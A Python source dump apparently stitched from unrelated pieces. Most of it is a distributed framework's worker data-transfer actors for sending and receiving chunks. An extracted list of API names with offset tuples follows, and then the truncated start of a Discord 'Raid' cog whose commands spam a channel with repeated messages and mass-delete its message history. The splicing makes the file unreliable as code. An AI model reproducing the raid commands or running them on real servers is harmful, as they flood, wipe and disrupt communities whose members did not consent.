class ReceiveStatus(Enum):
NOT_STARTED = 0
PENDING = 1
RECEIVING = 2
RECEIVED = 3
ERROR = 4
class EndpointTransferState(object):
"""
Structure providing transfer status in an endpoint
"""
__slots__ = 'parts', 'total_size', 'keys', 'end_marks', 'send_future'
def __init__(self):
self.reset()
self.send_future = None
def reset(self):
self.parts = []
self.total_size = 0
self.keys = []
self.end_marks = []
class SenderActor(WorkerActor):
"""
Actor handling sending data to ReceiverActors in other workers
"""
def __init__(self):
super().__init__()
self._dispatch_ref = None
self._events_ref = None
def post_create(self):
from .dispatcher import DispatchActor
from .events import EventsActor
super().post_create()
self._events_ref = self.ctx.actor_ref(EventsActor.default_uid())
if not self.ctx.has_actor(self._events_ref):
self._events_ref = None
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
self._dispatch_ref.register_free_slot(self.uid, 'sender')
@promise.reject_on_exception
@log_unhandled
def send_data(self, session_id, chunk_keys, target_endpoints, ensure_cached=True,
compression=None, block_size=None, pin_token=None, timeout=None, callback=None):
"""
Send data to other workers
:param session_id: session id
:param chunk_keys: chunks to be sent
:param target_endpoints: endpoints to receive this chunk
:param ensure_cached: if True, make sure the data is in the shared storage of the target worker
:param compression: compression type when transfer in network
:param block_size: size of data block
:param pin_token: token to pin the data
:param timeout: timeout of data sending
:param callback: promise callback
"""
chunk_keys = list(chunk_keys)
target_endpoints = list(target_endpoints)
block_size = block_size or options.worker.transfer_block_size
data_sizes = self.storage_client.get_data_sizes(session_id, chunk_keys)
if any(s is None for s in data_sizes):
raise DependencyMissing('Dependencies %r not met when sending.'
% [k for k, s in zip(chunk_keys, data_sizes) if s is None])
compression = compression or dataserializer.CompressType(options.worker.transfer_compression)
wait_refs = []
addrs_to_chunks = dict()
keys_to_readers = dict()
receiver_refs = []
receiver_manager_ref_dict = dict(
(ep, self.promise_ref(ReceiverManagerActor.default_uid(), address=ep))
for ep in target_endpoints)
@log_unhandled
def _create_local_readers():
promises = []
for k in chunk_keys:
promises.append(self.storage_client.create_reader(
session_id, k, source_devices, packed=True, packed_compression=compression)
.then(functools.partial(operator.setitem, keys_to_readers, k)))
return promise.all_(promises)
@log_unhandled
def _create_remote_writers():
nonlocal data_sizes
create_write_promises = []
data_sizes = self.storage_client.get_data_sizes(session_id, chunk_keys)
for ref in receiver_manager_ref_dict.values():
# register transfer actions
create_write_promises.append(
ref.create_data_writers(
session_id, chunk_keys, data_sizes, self.ref(), ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, _timeout=timeout, _promise=True
).then(_handle_created)
)
return promise.all_(create_write_promises).then(lambda *_: keys_to_readers)
@log_unhandled
def _handle_created(ref, statuses):
manager_ref = receiver_manager_ref_dict[ref.address]
# filter out endpoints already transferred or already started transfer
keys_receiving, keys_to_receive = [], []
for k, status in zip(chunk_keys, statuses):
if status == ReceiveStatus.RECEIVING:
keys_receiving.append(k)
elif status is None:
keys_to_receive.append(k)
if keys_to_receive:
addrs_to_chunks[ref.address] = keys_to_receive
receiver_refs.append(self.promise_ref(ref))
if keys_receiving:
wait_refs.append(manager_ref.add_keys_callback(
session_id, keys_receiving, _timeout=timeout, _promise=True))
@log_unhandled
def _finalize(*_):
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True)
self.tell_promise(callback, data_sizes)
@log_unhandled
def _handle_rejection(*exc):
logger.exception('Transfer chunks %r to %r failed', chunk_keys, target_endpoints, exc_info=exc)
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True)
for reader in keys_to_readers.values():
reader.close()
keys_to_readers.clear()
for ref in receiver_refs:
ref.cancel_receive(session_id, addrs_to_chunks[ref.address], _tell=True, _wait=False)
self.tell_promise(callback, *exc, _accept=False)
try:
if options.vineyard.socket:
source_devices = [DataStorageDevice.VINEYARD, DataStorageDevice.DISK] # pragma: no cover
else:
source_devices = [DataStorageDevice.SHARED_MEMORY, DataStorageDevice.DISK]
_create_local_readers().then(_create_remote_writers) \
.then(lambda *_: self._compress_and_send(
session_id, addrs_to_chunks, receiver_refs, keys_to_readers,
block_size=block_size, timeout=timeout,
)) \
.then(lambda *_: promise.all_(wait_refs)) \
.then(_finalize, _handle_rejection)
except: # noqa: E722
_handle_rejection(*sys.exc_info())
return
@log_unhandled
def _compress_and_send(self, session_id, addrs_to_chunks, receiver_refs, keys_to_readers,
block_size, timeout=None):
"""
Compress and send data to receivers in chunked manner
:param session_id: session id
:param addrs_to_chunks: dict mapping endpoints to chunks to send
:param receiver_refs: refs to send data to
"""
# collect data targets
chunks_to_addrs = defaultdict(set)
for addr, chunks in addrs_to_chunks.items():
for key in chunks:
chunks_to_addrs[key].add(addr)
all_chunk_keys = sorted(chunks_to_addrs.keys(), key=lambda k: len(chunks_to_addrs[k]))
addr_statuses = dict((k, EndpointTransferState()) for k in addrs_to_chunks.keys())
addr_to_refs = dict((ref.address, ref) for ref in receiver_refs)
# start compress and send data into targets
logger.debug('Data writer for chunks %r allocated at targets, start transmission', all_chunk_keys)
# filter out endpoints we need to send to
try:
if not receiver_refs:
self._dispatch_ref.register_free_slot(self.uid, 'sender', _tell=True, _wait=False)
return
cur_key_id = 0
cur_key = all_chunk_keys[cur_key_id]
cur_reader = keys_to_readers[cur_key]
with EventContext(self._events_ref, EventCategory.PROCEDURE, EventLevel.NORMAL,
ProcedureEventType.NETWORK, self.uid):
while cur_key_id < len(all_chunk_keys):
# read a data part from reader we defined above
pool = cur_reader.get_io_pool()
next_part = pool.submit(cur_reader.read, block_size).result()
file_eof = len(next_part) < block_size
for addr in chunks_to_addrs[cur_key]:
addr_status = addr_statuses[addr]
addr_status.parts.append(next_part)
addr_status.keys.append(cur_key)
addr_status.total_size += len(next_part)
addr_status.end_marks.append(file_eof)
if addr_status.total_size >= block_size:
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
addr_status.send_future = addr_to_refs[addr].receive_data_part(
session_id, addr_status.keys, addr_status.end_marks,
*addr_status.parts, _wait=False)
addr_status.reset()
# when some part goes to end, move to the next chunk
if file_eof:
cur_reader.close()
cur_key_id += 1
if cur_key_id < len(all_chunk_keys):
# still some chunks left unhandled
cur_key = all_chunk_keys[cur_key_id]
cur_reader = keys_to_readers[cur_key]
else:
# all chunks handled
for addr, addr_status in addr_statuses.items():
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
if addr_status.parts:
# send remaining chunks
addr_status.end_marks[-1] = True
addr_status.send_future = addr_to_refs[addr].receive_data_part(
session_id, addr_status.keys, addr_status.end_marks,
*addr_status.parts, _wait=False)
addr_status.reset()
for addr_status in addr_statuses.values():
if addr_status.send_future:
addr_status.send_future.result(timeout=timeout)
addr_status.reset()
except: # noqa: E722
for ref in receiver_refs:
ref.cancel_receive(session_id, addrs_to_chunks[ref.address], _tell=True, _wait=False)
raise
finally:
for reader in keys_to_readers.values():
reader.close()
class ReceiverDataMeta(object):
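    """
    Bookkeeping record for a single chunk being received: timing, size, source
    endpoint, transfer status and the callbacks to fire once the transfer finishes.
    """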
__slots__ = 'start_time', 'chunk_size', 'source_address',\
'status', 'transfer_event_id', 'receiver_worker_uid', \
'callback_ids', 'callback_args', 'callback_kwargs'
def __init__(self, start_time=None, chunk_size=None, source_address=None,
transfer_event_id=None, receiver_worker_uid=None, status=None,
callback_ids=None, callback_args=None, callback_kwargs=None):
self.start_time = start_time
self.chunk_size = chunk_size
self.source_address = source_address
self.status = status
self.transfer_event_id = transfer_event_id
self.receiver_worker_uid = receiver_worker_uid
self.callback_ids = callback_ids or []
self.callback_args = callback_args or ()
self.callback_kwargs = callback_kwargs or {}
def update(self, **kwargs):
kwargs['callback_ids'] = list(set(self.callback_ids) | set(kwargs.get('callback_ids') or ()))
for k, v in kwargs.items():
setattr(self, k, v)
class ReceiverManagerActor(WorkerActor):
def __init__(self):
super().__init__()
self._data_metas = dict()
self._max_callback_id = 0
self._callback_id_to_callbacks = dict()
self._callback_id_to_keys = dict()
self._dispatch_ref = None
def post_create(self):
super().post_create()
from .dispatcher import DispatchActor
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
def _update_data_meta(self, session_id, data_key, **kwargs):
try:
self._data_metas[(session_id, data_key)].update(**kwargs)
except KeyError:
self._data_metas[(session_id, data_key)] = ReceiverDataMeta(**kwargs)
@promise.reject_on_exception
@log_unhandled
def create_data_writers(self, session_id, data_keys, data_sizes, sender_ref,
ensure_cached=True, pin_token=None, timeout=0,
use_promise=True, callback=None):
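        """
        Allocate data writers for the given chunks on a hashed receiver slot.
        Chunks already stored locally or already being received are skipped; a None
        entry in the returned statuses tells the sender that the chunk still needs
        to be transmitted.
        """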
sender_address = None if sender_ref is None else sender_ref.address
logger.debug('Begin creating transmission data writer for chunks %r from %s',
data_keys, sender_address)
data_locations = dict(zip(
data_keys, self.storage_client.get_data_locations(session_id, data_keys)))
keys_to_fetch = []
sizes_to_fetch = []
statuses = []
slot_ref = self.promise_ref(self._dispatch_ref.get_hash_slot('receiver', repr(data_keys)))
for chunk_key, data_size in zip(data_keys, data_sizes):
session_chunk_key = (session_id, chunk_key)
try:
data_meta = self._data_metas[session_chunk_key]
except KeyError:
data_meta = self._data_metas[session_chunk_key] = \
ReceiverDataMeta(chunk_size=data_size, source_address=sender_address,
status=ReceiveStatus.NOT_STARTED)
if data_locations.get(chunk_key):
data_meta.status = ReceiveStatus.RECEIVED
statuses.append(ReceiveStatus.RECEIVED)
self._update_data_meta(session_id, chunk_key, status=ReceiveStatus.RECEIVED)
continue
elif data_meta.status == ReceiveStatus.RECEIVING:
# data transfer already started
logger.debug('Chunk %s already started transmission', chunk_key)
statuses.append(ReceiveStatus.RECEIVING)
continue
elif data_meta.status == ReceiveStatus.RECEIVED:
data_meta = self._data_metas[session_chunk_key] = \
ReceiverDataMeta(chunk_size=data_size, source_address=sender_address,
status=ReceiveStatus.NOT_STARTED)
data_meta.start_time = time.time()
data_meta.receiver_worker_uid = slot_ref.uid
data_meta.source_address = sender_address
data_meta.status = ReceiveStatus.RECEIVING
self._update_data_meta(session_id, chunk_key, chunk_size=data_size,
source_address=sender_address, status=ReceiveStatus.RECEIVING)
keys_to_fetch.append(chunk_key)
sizes_to_fetch.append(data_size)
statuses.append(None) # this notifies the sender to transmit data
if use_promise:
if keys_to_fetch:
slot_ref.create_data_writers(
session_id, keys_to_fetch, sizes_to_fetch, sender_ref, ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, use_promise=use_promise, _promise=True) \
.then(lambda *_: self.tell_promise(callback, slot_ref, statuses))
else:
self.tell_promise(callback, slot_ref, statuses)
else:
slot_ref.create_data_writers(
session_id, keys_to_fetch, sizes_to_fetch, sender_ref, ensure_cached=ensure_cached,
timeout=timeout, pin_token=pin_token, use_promise=use_promise)
return slot_ref, statuses
def register_pending_keys(self, session_id, data_keys):
for key in data_keys:
session_data_key = (session_id, key)
if session_data_key not in self._data_metas \
or self._data_metas[session_data_key].status == ReceiveStatus.ERROR:
self._update_data_meta(session_id, key, status=ReceiveStatus.PENDING,
callback_args=(), callback_kwargs={})
def filter_receiving_keys(self, session_id, data_keys):
keys = []
receiving_status = (ReceiveStatus.PENDING, ReceiveStatus.RECEIVING)
for k in data_keys:
try:
if self._data_metas[(session_id, k)].status in receiving_status:
keys.append(k)
except KeyError:
pass
return keys
def add_keys_callback(self, session_id, data_keys, callback):
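        # Register a callback fired once all listed keys finish (or fail) receiving;
        # if none of them is still in flight, answer immediately with the stored result.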
cb_id = self._max_callback_id
self._max_callback_id += 1
receiving_status = (ReceiveStatus.PENDING, ReceiveStatus.RECEIVING)
registered_session_keys = []
args, kwargs = (), {}
for k in data_keys:
session_data_key = (session_id, k)
data_meta = self._data_metas[session_data_key] # type: ReceiverDataMeta
if data_meta.status in receiving_status:
registered_session_keys.append(session_data_key)
data_meta.callback_ids.append(cb_id)
else:
args, kwargs = data_meta.callback_args, data_meta.callback_kwargs
if registered_session_keys:
self._callback_id_to_callbacks[cb_id] = callback
self._callback_id_to_keys[cb_id] = set(registered_session_keys)
logger.debug('Callback for transferring %r registered', registered_session_keys)
else:
self._max_callback_id = cb_id
self.tell_promise(callback, *args, **kwargs)
def notify_keys_finish(self, session_id, data_keys, *args, **kwargs):
keys_to_clear = []
for data_key in data_keys:
session_data_key = (session_id, data_key)
try:
data_meta = self._data_metas[session_data_key] # type: ReceiverDataMeta
except KeyError:
logger.debug('Record of %s not found.', data_key)
continue
try:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
if kwargs.get('_accept', True):
data_meta.status = ReceiveStatus.RECEIVED
else:
data_meta.status = ReceiveStatus.ERROR
cb_ids = data_meta.callback_ids
data_meta.callback_ids = []
if not cb_ids:
continue
kwargs['_wait'] = False
notified = 0
for cb_id in cb_ids:
cb_keys = self._callback_id_to_keys[cb_id]
cb_keys.remove(session_data_key)
if not cb_keys:
del self._callback_id_to_keys[cb_id]
cb = self._callback_id_to_callbacks.pop(cb_id)
notified += 1
self.tell_promise(cb, *args, **kwargs)
logger.debug('%d transfer listeners of %s notified.', notified, data_key)
finally:
if data_meta.status == ReceiveStatus.RECEIVED:
keys_to_clear.append(data_key)
self.ref().clear_keys(session_id, keys_to_clear, _tell=True, _delay=5)
def clear_keys(self, session_id, keys):
for k in keys:
self._data_metas.pop((session_id, k), None)
class ReceiverWorkerActor(WorkerActor):
"""
Actor handling receiving data from a SenderActor
"""
def __init__(self):
super().__init__()
self._chunk_holder_ref = None
self._dispatch_ref = None
self._receiver_manager_ref = None
self._events_ref = None
self._status_ref = None
self._data_writers = dict()
self._writing_futures = dict()
self._data_metas = dict()
def post_create(self):
from .events import EventsActor
from .status import StatusActor
from .dispatcher import DispatchActor
super().post_create()
self._events_ref = self.ctx.actor_ref(EventsActor.default_uid())
if not self.ctx.has_actor(self._events_ref):
self._events_ref = None
self._status_ref = self.ctx.actor_ref(StatusActor.default_uid())
if not self.ctx.has_actor(self._status_ref):
self._status_ref = None
self._receiver_manager_ref = self.ctx.actor_ref(ReceiverManagerActor.default_uid())
if not self.ctx.has_actor(self._receiver_manager_ref):
self._receiver_manager_ref = None
self._dispatch_ref = self.promise_ref(DispatchActor.default_uid())
self._dispatch_ref.register_free_slot(self.uid, 'receiver')
@log_unhandled
def check_status(self, session_id, chunk_key):
"""
Check if data exists or is being transferred in the target worker
:param session_id: session id
:param chunk_key: chunk key
"""
session_chunk_key = (session_id, chunk_key)
if self.storage_client.get_data_locations(session_id, [chunk_key])[0]:
return ReceiveStatus.RECEIVED
if session_chunk_key in self._data_writers:
# data still being transferred
return ReceiveStatus.RECEIVING
return ReceiveStatus.NOT_STARTED
@promise.reject_on_exception
@log_unhandled
def create_data_writers(self, session_id, chunk_keys, data_sizes, sender_ref,
ensure_cached=True, timeout=0, pin_token=None,
use_promise=True, callback=None):
"""
Create a data writer for subsequent data transfer. The writer can either work on
shared storage or spill.
:param session_id: session id
:param chunk_keys: chunk keys
:param data_sizes: uncompressed data sizes
:param sender_ref: ActorRef of SenderActor
:param ensure_cached: if True, the data should be stored in shared memory,
otherwise spill is acceptable
:param timeout: timeout if the chunk receiver does not close
:param pin_token: token to pin the data
:param use_promise: if True, we use promise callback to notify accomplishment
of writer creation, otherwise the function returns directly
and when sill is needed, a StorageFull will be raised instead.
:param callback: promise callback
"""
promises = []
failed = False
if options.vineyard.socket:
device_order = [DataStorageDevice.VINEYARD] # pragma: no cover
else:
device_order = [DataStorageDevice.SHARED_MEMORY]
source_address = sender_ref.address if sender_ref is not None else None
if not ensure_cached:
device_order += [DataStorageDevice.DISK]
def _handle_accept_key(key, writer):
if failed:
writer.close(finished=False)
else:
self._data_writers[(session_id, key)] = writer
@log_unhandled
def _handle_reject_key(key, *exc):
nonlocal failed
if self.check_status(session_id, key) == ReceiveStatus.RECEIVED:
logger.debug('Chunk %s already received', key)
else:
logger.debug('Rejecting %s from putting into plasma.', key)
failed = True
self._stop_transfer_with_exc(session_id, chunk_keys, exc)
if callback is not None:
self.tell_promise(callback, *exc, _accept=False)
# configure timeout callback
if timeout:
self.ref().handle_receive_timeout(session_id, chunk_keys, _delay=timeout, _tell=True)
for chunk_key, data_size in zip(chunk_keys, data_sizes):
self._data_metas[(session_id, chunk_key)] = ReceiverDataMeta(
start_time=time.time(), chunk_size=data_size, source_address=source_address)
use_device_order = device_order \
if not isinstance(chunk_key, tuple) or not options.worker.write_shuffle_to_disk \
else [DataStorageDevice.DISK]
if use_promise:
promises.append(self.storage_client.create_writer(
session_id, chunk_key, data_size, use_device_order, packed=True,
pin_token=pin_token, _promise=True)
.then(functools.partial(_handle_accept_key, chunk_key),
functools.partial(_handle_reject_key, chunk_key)))
else:
try:
_writer = self.storage_client.create_writer(
session_id, chunk_key, data_size, use_device_order, packed=True,
pin_token=pin_token, _promise=False)
_handle_accept_key(chunk_key, _writer)
return self.address, None
except: # noqa: E722
_handle_reject_key(chunk_key, *sys.exc_info())
raise
promise.all_(promises).then(lambda *_: self.tell_promise(callback))
def _wait_unfinished_writing(self, session_id, data_key):
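        # Wait for any outstanding asynchronous write of this key to finish and drop
        # the future; a missing entry simply means nothing is pending.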
try:
self._writing_futures[(session_id, data_key)].result()
del self._writing_futures[(session_id, data_key)]
except KeyError:
pass
@log_unhandled
def receive_data_part(self, session_id, chunk_keys, end_marks, *data_parts):
"""
Receive data part from sender
:param session_id: session id
:param chunk_keys: chunk keys
:param end_marks: array with same number of boolean elements as chunk keys.
if one element is True, the corresponding data in data_parts
is the last part of the chunk.
:param data_parts: data parts to be written
"""
try:
finished_keys, finished_meta_keys, finished_metas = [], [], []
for chunk_key, data_part, end_mark in zip(chunk_keys, data_parts, end_marks):
self._wait_unfinished_writing(session_id, chunk_key)
session_chunk_key = (session_id, chunk_key)
try:
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
# if error occurred, interrupts
if data_meta.status == ReceiveStatus.ERROR:
raise data_meta.callback_args[1].with_traceback(data_meta.callback_args[2])
writer = self._data_writers[session_chunk_key]
pool = writer.get_io_pool()
self._writing_futures[session_chunk_key] = pool.submit(
writer.write, data_part)
if end_mark:
finished_keys.append(chunk_key)
if not isinstance(chunk_key, tuple):
finished_meta_keys.append(chunk_key)
finished_metas.append(WorkerMeta(chunk_size=data_meta.chunk_size,
workers=(self.address,)))
except: # noqa: E722
self._stop_transfer_with_exc(session_id, chunk_keys, sys.exc_info())
raise
if finished_keys:
for chunk_key in finished_keys:
session_chunk_key = (session_id, chunk_key)
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
self._wait_unfinished_writing(session_id, chunk_key)
# update transfer speed stats
if self._status_ref:
time_delta = time.time() - data_meta.start_time
self._status_ref.update_mean_stats(
'net_transfer_speed', data_meta.chunk_size * 1.0 / time_delta,
_tell=True, _wait=False)
self._data_writers[session_chunk_key].close()
data_meta.status = ReceiveStatus.RECEIVED
logger.debug('Transfer for data %s finished.', chunk_key)
del self._data_writers[session_chunk_key]
self._invoke_finish_callbacks(session_id, finished_keys)
if finished_meta_keys:
self.get_meta_client().batch_set_chunk_meta(session_id, finished_meta_keys, finished_metas)
finally:
del data_parts
def _is_receive_running(self, session_id, chunk_key):
receive_done_statuses = (ReceiveStatus.ERROR, ReceiveStatus.RECEIVED)
try:
return self._data_metas[(session_id, chunk_key)].status not in receive_done_statuses
except KeyError:
return False
@log_unhandled
def cancel_receive(self, session_id, chunk_keys, exc_info=None):
"""
Cancel data receive by returning an ExecutionInterrupted
:param session_id: session id
:param chunk_keys: chunk keys
:param exc_info: exception to raise
"""
receiving_keys = []
for k in chunk_keys:
if self._is_receive_running(session_id, k):
receiving_keys.append(k)
self._wait_unfinished_writing(session_id, k)
logger.debug('Transfer for %r cancelled.', chunk_keys)
if exc_info is None:
exc_info = build_exc_info(ExecutionInterrupted)
self._stop_transfer_with_exc(session_id, receiving_keys, exc_info)
@log_unhandled
def notify_dead_senders(self, dead_workers):
"""
When some peer workers are dead, corresponding receivers will be cancelled
:param dead_workers: endpoints of dead workers
"""
dead_workers = set(dead_workers)
exc_info = build_exc_info(WorkerDead)
session_to_keys = defaultdict(set)
for session_chunk_key in self._data_writers.keys():
if self._data_metas[session_chunk_key].source_address in dead_workers:
session_to_keys[session_chunk_key[0]].add(session_chunk_key[1])
for session_id, data_keys in session_to_keys.items():
self.ref().cancel_receive(session_id, list(data_keys), exc_info=exc_info, _tell=True)
@log_unhandled
def handle_receive_timeout(self, session_id, chunk_keys):
if not any(self._is_receive_running(session_id, k) for k in chunk_keys):
# if transfer already finishes, no needs to report timeout
return
logger.debug('Transfer for %r timed out, cancelling.', chunk_keys)
self._stop_transfer_with_exc(session_id, chunk_keys, build_exc_info(TimeoutError))
def _stop_transfer_with_exc(self, session_id, chunk_keys, exc):
for chunk_key in chunk_keys:
self._wait_unfinished_writing(session_id, chunk_key)
if not isinstance(exc[1], ExecutionInterrupted):
logger.exception('Error occurred in receiving %r. Cancelling transfer.',
chunk_keys, exc_info=exc)
for chunk_key in chunk_keys:
session_chunk_key = (session_id, chunk_key)
# stop and close data writer
try:
# transfer is not finished yet, we need to clean up unfinished stuffs
self._data_writers[session_chunk_key].close(finished=False)
del self._data_writers[session_chunk_key]
except KeyError:
# transfer finished and writer cleaned, no need to clean up
pass
try:
data_meta = self._data_metas[session_chunk_key] # type: ReceiverDataMeta
data_meta.status = ReceiveStatus.ERROR
except KeyError:
pass
self._invoke_finish_callbacks(session_id, chunk_keys, *exc, **dict(_accept=False))
def _invoke_finish_callbacks(self, session_id, chunk_keys, *args, **kwargs):
# invoke registered callbacks for chunk
for k in chunk_keys:
try:
data_meta = self._data_metas.pop((session_id, k)) # type: ReceiverDataMeta
except KeyError:
continue
if data_meta.transfer_event_id is not None and self._events_ref is not None:
self._events_ref.close_event(data_meta.transfer_event_id, _tell=True, _wait=False)
if not kwargs.get('_accept', True):
if not data_meta.callback_args or data_meta.callback_args[0] is ExecutionInterrupted:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
else:
args = data_meta.callback_args
kwargs = data_meta.callback_kwargs
else:
data_meta.callback_args = args
data_meta.callback_kwargs = kwargs
kwargs['_tell'] = True
if self._receiver_manager_ref:
self._receiver_manager_ref.notify_keys_finish(session_id, chunk_keys, *args, **kwargs)
class ResultCopyActor(WorkerActor):
def start_copy(self, session_id, chunk_key, targets):
locations = [v[1] for v in self.storage_client.get_data_locations(session_id, [chunk_key])[0]]
if set(locations).intersection(targets):
return
ev = self.ctx.event()
self.storage_client.copy_to(session_id, [chunk_key], targets) \
.then(lambda *_: ev.set())
return ev
class ResultSenderActor(WorkerActor):
"""
Actor handling sending result to user client
"""
def __init__(self):
super().__init__()
self._result_copy_ref = None
self._serialize_pool = None
def post_create(self):
super().post_create()
self._serialize_pool = self.ctx.threadpool(1)
self._result_copy_ref = self.ctx.create_actor(ResultCopyActor, uid=ResultCopyActor.default_uid())
def pre_destroy(self):
self._result_copy_ref.destroy()
super().pre_destroy()
def fetch_batch_data(self, session_id, chunk_keys, index_objs=None, compression_type=None):
results = []
if index_objs is not None:
for chunk_key, index_obj in zip(chunk_keys, index_objs):
results.append(self.fetch_data(session_id, chunk_key, index_obj, compression_type=compression_type))
else:
for chunk_key in chunk_keys:
results.append(self.fetch_data(session_id, chunk_key, compression_type=compression_type))
return results
def fetch_data(self, session_id, chunk_key, index_obj=None, compression_type=None):
if compression_type is None:
compression_type = dataserializer.CompressType(options.worker.transfer_compression)
if index_obj is None:
if options.vineyard.socket:
target_devs = [DataStorageDevice.VINEYARD, DataStorageDevice.DISK] # pragma: no cover
else:
target_devs = [DataStorageDevice.SHARED_MEMORY, DataStorageDevice.DISK]
ev = self._result_copy_ref.start_copy(session_id, chunk_key, target_devs)
if ev:
ev.wait(options.worker.prepare_data_timeout)
reader = self.storage_client.create_reader(
session_id, chunk_key, target_devs, packed=True,
packed_compression=compression_type, _promise=False)
with reader:
pool = reader.get_io_pool()
return pool.submit(reader.read).result()
else:
try:
if options.vineyard.socket:
memory_device = DataStorageDevice.VINEYARD # pragma: no cover
else:
memory_device = DataStorageDevice.SHARED_MEMORY
value = self.storage_client.get_object(
session_id, chunk_key, [memory_device], _promise=False)
except IOError:
reader = self.storage_client.create_reader(
session_id, chunk_key, [DataStorageDevice.DISK], packed=False, _promise=False)
with reader:
pool = reader.get_io_pool()
value = dataserializer.deserialize(pool.submit(reader.read).result())
try:
sliced_value = value.iloc[tuple(index_obj)]
except AttributeError:
sliced_value = value[tuple(index_obj)]
return self._serialize_pool.submit(
dataserializer.dumps, sliced_value, compress=compression_type).result()
def put_remote_chunk(session_id, chunk_key, data, receiver_manager_ref):
"""
    Put a chunk to the target machine using the given receiver_manager_ref
"""
from .dataio import ArrowBufferIO
buf = dataserializer.serialize(data).to_buffer()
receiver_ref, _ = receiver_manager_ref.create_data_writers(
session_id, [chunk_key], [buf.size], None, ensure_cached=False, use_promise=False)
receiver_ref = receiver_manager_ref.ctx.actor_ref(receiver_ref)
block_size = options.worker.transfer_block_size
reader = None
try:
reader = ArrowBufferIO(buf, 'r', block_size=block_size)
futures = []
while True:
next_part = reader.read(block_size)
is_last = not next_part or len(next_part) < block_size
[f.result() for f in futures]
futures.append(receiver_ref.receive_data_part(
session_id, [chunk_key], [is_last], next_part, _wait=False))
if is_last:
[f.result() for f in futures]
break
except: # noqa: E722
receiver_ref.cancel_receive(session_id, [chunk_key])
raise
finally:
if reader:
reader.close()
del reader
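# A minimal usage sketch for put_remote_chunk, assuming a live receiver manager actor
# reference; the session id, chunk key and payload below are illustrative placeholders
# rather than values defined in this module.
def _put_remote_chunk_example(receiver_manager_ref):
    import numpy as np
    # Streams a small array to the remote worker in blocks of transfer_block_size,
    # cancelling the receive on the remote side if any part fails.
    put_remote_chunk('session-demo', 'chunk-demo', np.arange(10), receiver_manager_ref)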
|
[
"functools.partial",
"time.time",
"collections.defaultdict",
"sys.exc_info",
"logging.getLogger"
] |
[((1146, 1173), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1163, 1173), False, 'import logging\n'), ((8004, 8020), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (8015, 8020), False, 'from collections import defaultdict\n'), ((31489, 31505), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (31500, 31505), False, 'from collections import defaultdict\n'), ((15972, 15983), 'time.time', 'time.time', ([], {}), '()\n', (15981, 15983), False, 'import time\n'), ((25494, 25505), 'time.time', 'time.time', ([], {}), '()\n', (25503, 25505), False, 'import time\n'), ((4313, 4368), 'functools.partial', 'functools.partial', (['operator.setitem', 'keys_to_readers', 'k'], {}), '(operator.setitem, keys_to_readers, k)\n', (4330, 4368), False, 'import functools\n'), ((7496, 7510), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7508, 7510), False, 'import sys\n'), ((26013, 26061), 'functools.partial', 'functools.partial', (['_handle_accept_key', 'chunk_key'], {}), '(_handle_accept_key, chunk_key)\n', (26030, 26061), False, 'import functools\n'), ((26089, 26137), 'functools.partial', 'functools.partial', (['_handle_reject_key', 'chunk_key'], {}), '(_handle_reject_key, chunk_key)\n', (26106, 26137), False, 'import functools\n'), ((28860, 28874), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (28872, 28874), False, 'import sys\n'), ((29341, 29352), 'time.time', 'time.time', ([], {}), '()\n', (29350, 29352), False, 'import time\n'), ((26588, 26602), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (26600, 26602), False, 'import sys\n')]
|
# By Snu
# The creator is not responsible for misuse
"""
MIT License
Copyright (c) 2022 Snu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from asyncio import get_running_loop
from discord.ext import commands
from discord import Permissions
from colorama import Fore, Style
from random import choice
from json import loads
from datetime import datetime
with open("files/config.json") as file:
content = loads(file.read())
class Raid(commands.Cog):
def __init__(self, client):
self.client = client
self.time = lambda: datetime.now().strftime('%H:%M:%S')
self.nomes = content["nomes"] if content["nomes"] != [] else [""]
@commands.command(aliases=content["spam"][1:])
async def spam(self, ctx, repeat:int, *, msg):
cmd = ctx.invoked_with.lower()
count = 0
for i in range(repeat):
try:
await ctx.channel.send(content=msg)
print(f"{Fore.YELLOW}[{cmd.upper()}] Mensagem enviada com sucesso "
f"no canal -> {ctx.channel.id} - {self.time()}{Style.RESET_ALL}")
count += 1
except: print(f"{Fore.RED}[{cmd.upper()}] Erro ao enviar a mensagem "
f"no canal -> {ctx.channel.id} - {self.time()}{Style.RESET_ALL}")
print(f"{Fore.YELLOW}[{cmd.upper()}] {count} Mensagem(ns) enviada(s) com sucesso - {self.time()}{Style.RESET_ALL}")
@commands.command(aliases=content["purge"][1:])
async def purge(self, ctx, limit:int=100):
cmd = ctx.invoked_with.lower()
count = count_error = 0
async for message in ctx.channel.history(limit=limit):
try:
await message.delete()
